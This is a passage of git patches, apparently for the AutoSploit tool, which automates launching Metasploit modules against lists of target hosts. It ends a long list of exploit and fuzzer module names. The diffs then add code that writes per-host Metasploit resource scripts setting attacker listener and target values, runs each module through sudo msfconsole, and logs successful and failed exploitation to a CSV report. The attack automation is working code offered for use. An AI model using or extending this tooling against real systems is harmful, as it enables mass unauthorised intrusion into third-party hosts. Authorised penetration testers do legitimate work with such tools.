"exploit/linux/http/trendmicro_imsva_widget_exec", + "exploit/linux/http/trueonline_billion_5200w_rce", + "exploit/linux/http/trueonline_p660hn_v1_rce", + "exploit/linux/http/trueonline_p660hn_v2_rce", + "exploit/linux/http/vcms_upload", + "exploit/linux/misc/lprng_format_string", + "exploit/linux/misc/mongod_native_helper", + "exploit/linux/misc/ueb9_bpserverd", + "exploit/linux/mysql/mysql_yassl_getname", + "exploit/linux/pop3/cyrus_pop3d_popsubfolders", + "exploit/linux/postgres/postgres_payload", + "exploit/linux/pptp/poptop_negative_read", + "exploit/linux/proxy/squid_ntlm_authenticate", + "exploit/linux/samba/lsa_transnames_heap", + "exploit/linux/samba/setinfopolicy_heap", + "exploit/linux/samba/trans2open", + "exploit/multi/elasticsearch/script_mvel_rce", + "exploit/multi/elasticsearch/search_groovy_script", + "exploit/multi/http/atutor_sqli", + "exploit/multi/http/axis2_deployer", + "exploit/multi/http/familycms_less_exe", + "exploit/multi/http/freenas_exec_raw", + "exploit/multi/http/gestioip_exec", + "exploit/multi/http/glassfish_deployer", + "exploit/multi/http/glpi_install_rce", + "exploit/multi/http/joomla_http_header_rce ", + "exploit/multi/http/makoserver_cmd_exec", + "exploit/multi/http/novell_servicedesk_rc", + "exploit/multi/http/oracle_reports_rce", + "exploit/multi/http/php_utility_belt_rce", + "exploit/multi/http/phpfilemanager_rce", + "exploit/multi/http/phpmyadmin_3522_backdoor", + "exploit/multi/http/phpwiki_ploticus_exec", + "exploit/multi/http/processmaker_exec", + "exploit/multi/http/rails_actionpack_inline_exec", + "exploit/multi/http/rails_dynamic_render_code_exec", + "exploit/multi/http/rails_secret_deserialization", + "exploit/multi/http/rocket_servergraph_file_requestor_rce", + "exploit/multi/http/simple_backdoors_exec", + "exploit/multi/http/spree_search_exec", + "exploit/multi/http/spree_searchlogic_exec", + "exploit/multi/http/struts2_rest_xstream", + "exploit/multi/http/struts_code_exec", + "exploit/multi/http/struts_code_exec_classloader", + "exploit/multi/http/struts_code_exec_parameters", + "exploit/multi/http/struts_dev_mode", + "exploit/multi/http/sysaid_auth_file_upload", + "exploit/multi/http/tomcat_jsp_upload_bypass", + "exploit/multi/http/vtiger_install_rce", + "exploit/multi/http/werkzeug_debug_rce", + "exploit/multi/http/zemra_panel_rce", + "exploit/multi/http/zpanel_information_disclosure_rce", + "exploit/multi/ids/snort_dce_rpc", + "exploit/multi/misc/batik_svg_java", + "exploit/multi/misc/pbot_exec", + "exploit/multi/misc/veritas_netbackup_cmdexec", + "exploit/multi/mysql/mysql_udf_payload", + "exploit/multi/php/php_unserialize_zval_cookie", + "exploit/unix/http/freepbx_callmenum", + "exploit/unix/http/lifesize_room", + "exploit/unix/http/pfsense_clickjacking", + "exploit/unix/http/pfsense_group_member_exec", + "exploit/unix/http/tnftp_savefile", + "exploit/unix/misc/polycom_hdx_traceroute_exec", + "exploit/unix/webapp/awstats_migrate_exec", + "exploit/unix/webapp/carberp_backdoor_exec", + "exploit/unix/webapp/citrix_access_gateway_exec", + "exploit/unix/webapp/dogfood_spell_exec", + "exploit/unix/webapp/invision_pboard_unserialize_exec", + "exploit/unix/webapp/joomla_contenthistory_sqli_rce", + "exploit/unix/webapp/mybb_backdoor", + "exploit/unix/webapp/opensis_modname_exec", + "exploit/unix/webapp/oscommerce_filemanager", + "exploit/unix/webapp/piwik_superuser_plugin_upload", + "exploit/unix/webapp/tikiwiki_upload_exec", + "exploit/unix/webapp/webtester_exec", + "exploit/unix/webapp/wp_phpmailer_host_header", + "exploit/unix/webapp/wp_total_cache_exec", + "exploit/windows/antivirus/symantec_endpoint_manager_rce", + "exploit/windows/http/ektron_xslt_exec", + "exploit/windows/http/ektron_xslt_exec_ws", + "exploit/windows/http/geutebrueck_gcore_x64_rce_bo", + "exploit/windows/http/hp_autopass_license_traversal", + "exploit/windows/http/manage_engine_opmanager_rce", + "exploit/windows/http/netgear_nms_rce", + "exploit/windows/http/sepm_auth_bypass_rce", + "exploit/windows/http/trendmicro_officescan_widget_exec", + "exploit/windows/iis/iis_webdav_upload_asp", + "exploit/windows/iis/msadc", + "exploit/windows/misc/manageengine_eventlog_analyzer_rce", + "exploit/windows/novell/file_reporter_fsfui_upload", + "exploit/windows/scada/ge_proficy_cimplicity_gefebt", + "exploit/windows/smb/ipass_pipe_exec", + "exploit/windows/smb/smb_relay", + "auxiliary/sqli/oracle/jvm_os_code_10g", + "auxiliary/sqli/oracle/jvm_os_code_11g", + "auxiliary/fuzzers/dns/dns_fuzzer", + "auxiliary/fuzzers/ftp/client_ftp", + "auxiliary/fuzzers/ftp/ftp_pre_post", + "auxiliary/fuzzers/http/http_form_field", + "auxiliary/fuzzers/http/http_get_uri_long", + "auxiliary/fuzzers/http/http_get_uri_strings", + "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer", + "auxiliary/fuzzers/smb/smb2_negotiate_corrupt", + "auxiliary/fuzzers/smb/smb_create_pipe", + "auxiliary/fuzzers/smb/smb_create_pipe_corrupt", + "auxiliary/fuzzers/smb/smb_negotiate_corrupt ", + "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt", + "auxiliary/fuzzers/smb/smb_tree_connect", + "auxiliary/fuzzers/smb/smb_tree_connect_corrupt", + "auxiliary/fuzzers/smtp/smtp_fuzzer", + "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt", + "auxiliary/fuzzers/ssh/ssh_version_15", + "auxiliary/fuzzers/ssh/ssh_version_2", + "auxiliary/fuzzers/ssh/ssh_version_corrupt", + "auxiliary/fuzzers/tds/tds_login_corrupt", + "auxiliary/fuzzers/tds/tds_login_username" ] } diff --git a/lib/exploitation/exploiter.py b/lib/exploitation/exploiter.py index 3525e5f..7836e92 100644 --- a/lib/exploitation/exploiter.py +++ b/lib/exploitation/exploiter.py @@ -1,6 +1,16 @@ +import datetime +import csv +import re +from os import ( + makedirs, + path, + linesep +) + import lib.settings import lib.output + def whitelist_wash(hosts, whitelist_file): """ remove IPs from hosts list that do not appear in WHITELIST_FILE @@ -55,22 +65,95 @@ def start_exploit(self): start the exploit, there is still no rollover but it's being worked """ # TODO:/ fix the rollover issue here - template = ( - "sudo {} {} -x 'workspace -a {}; " - "setg LHOST {}; setg LPORT {}; setg VERBOSE " - "true; setg THREADS 100; set RHOST {}; set RHOSTS {}; use {} -j;'" - ) + + today_printable = datetime.datetime.today().strftime("%Y-%m-%d_%Hh%Mm%Ss") + current_run_path = path.join(lib.settings.RC_SCRIPTS_PATH, today_printable) + makedirs(current_run_path) + + report_path = path.join(current_run_path, "report.csv") + with open(report_path, 'w') as f: + csv_file = csv.writer(f, quoting=csv.QUOTE_ALL) + csv_file.writerow(['Target Host', + 'Date (UTC)', + 'MSF Module', + "LocalHost", + "Listening Port", + "Successful Logs", + "Failure Logs", + "All Logs"]) + for host in self.hosts: + current_host_path = path.join(current_run_path, host.strip()) + makedirs(current_host_path) + for mod in self.mods: lib.output.info( "launching exploit '{}' against host '{}'".format( mod.strip(), host.strip() ) ) - template = template.format( - "ruby" if self.ruby_exec else "", - self.msf_path if self.msf_path is not None else "msfconsole", - self.configuration[0], self.configuration[1], self.configuration[2], - host.strip(), host.strip(), mod.strip() + cmd_template = ( + "sudo {use_ruby} {msf_path} -r {rc_script_path} -q" + ) + + use_ruby = "ruby" if self.ruby_exec else "" + msf_path = self.msf_path if self.msf_path is not None else "msfconsole" + + + + # What's the point of having a workspace if you overwrite it every fucking time.. + rc_script_template = ( + "workspace -a {workspace}\n" + "use {module_name}\n" + "setg lhost {lhost}\n" + "setg lport {lport}\n" + "setg verbose true\n" + "setg threads 20\n" + "set rhost {rhost}\n" + "set rhosts {rhosts}\n" + "run\n" + "exit\n" ) - lib.settings.cmdline(template) + + module_name=mod.strip() + workspace=self.configuration[0] + lhost=self.configuration[1] + lport=self.configuration[2] + rhost=host.strip() + + current_rc_script_path = path.join(current_host_path, mod.replace("/", '-').strip()) + with open(current_rc_script_path, 'w') as f: + + f.writelines(rc_script_template.format( + module_name=module_name, + workspace=workspace, + lhost=lhost, + lport=lport, + rhost=rhost, + rhosts=rhost + )) + + with open(report_path, 'a') as f: + + cmd = cmd_template.format( + use_ruby=use_ruby, + msf_path=msf_path, + rc_script_path=current_rc_script_path + ) + + output = lib.settings.cmdline(cmd) + + ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]') + msf_output_lines = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[.\]', x)]) + msf_wins = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[\+\]', x)]) + msf_fails = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[-\]', x)]) + + csv_file = csv.writer(f, quoting=csv.QUOTE_ALL) + csv_file.writerow([rhost, + today_printable, + module_name, + lhost, + lport, + msf_wins, + msf_fails, + msf_output_lines]) diff --git a/lib/settings.py b/lib/settings.py index a6a91fd..c928f5e 100644 --- a/lib/settings.py +++ b/lib/settings.py @@ -7,7 +7,10 @@ import getpass import tempfile import distutils.spawn -# import subprocess +from subprocess import ( + PIPE, + Popen +) import psutil @@ -28,6 +31,8 @@ # one bash script to rule them all takes an argument via the operating system START_SERVICES_PATH = "{}/etc/scripts/start_services.sh".format(CUR_DIR) +RC_SCRIPTS_PATH = "{}/autosploit_out/".format(CUR_DIR) + # path to the file that will contain our query QUERY_FILE_PATH = tempfile.NamedTemporaryFile(delete=False).name @@ -166,14 +171,19 @@ def cmdline(command): I intend to have the issue resolved by Version 1.5.0. """ - os.system(command) - '''process = subprocess.call( - args=" ".join(command), - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - shell=True - ) - return process''' + #os.system(command) + lib.output.info("Executing command {}".format(command)) + split_cmd = [x.strip() for x in command.split(" ") if x] + + sys.stdout.flush() + + proc = Popen(split_cmd, stdout=PIPE, bufsize=1) + stdout_buff = [] + for stdout_line in iter(proc.stdout.readline, b''): + stdout_buff += [stdout_line.rstrip()] + print(">>>> {}".format(stdout_line).rstrip()) + + return stdout_buff def check_for_msf(): From a071719ccc47c816388b107cddc225490ce3ab49 Mon Sep 17 00:00:00 2001 From: Ekultek Date: Tue, 3 Apr 2018 11:54:28 -0500 Subject: [PATCH 6/7] updating the output image --- lib/settings.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/settings.py b/lib/settings.py index c928f5e..25a9023 100644 --- a/lib/settings.py +++ b/lib/settings.py @@ -181,7 +181,7 @@ def cmdline(command): stdout_buff = [] for stdout_line in iter(proc.stdout.readline, b''): stdout_buff += [stdout_line.rstrip()] - print(">>>> {}".format(stdout_line).rstrip()) + print("(msf)>> {}".format(stdout_line).rstrip()) return stdout_buff From c06bb6e1bc7fa709a19aef355f7a6c2f3952e687 Mon Sep 17 00:00:00 2001 From: Ekultek Date: Tue, 3 Apr 2018 11:55:18 -0500 Subject: [PATCH 7/7] updating the output for this as well --- lib/settings.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/settings.py b/lib/settings.py index 25a9023..2baac3a 100644 --- a/lib/settings.py +++ b/lib/settings.py @@ -172,7 +172,7 @@ def cmdline(command): """ #os.system(command) - lib.output.info("Executing command {}".format(command)) + lib.output.info("Executing command '{}'".format(command.strip())) split_cmd = [x.strip() for x in command.split(" ") if x] sys.stdout.flush()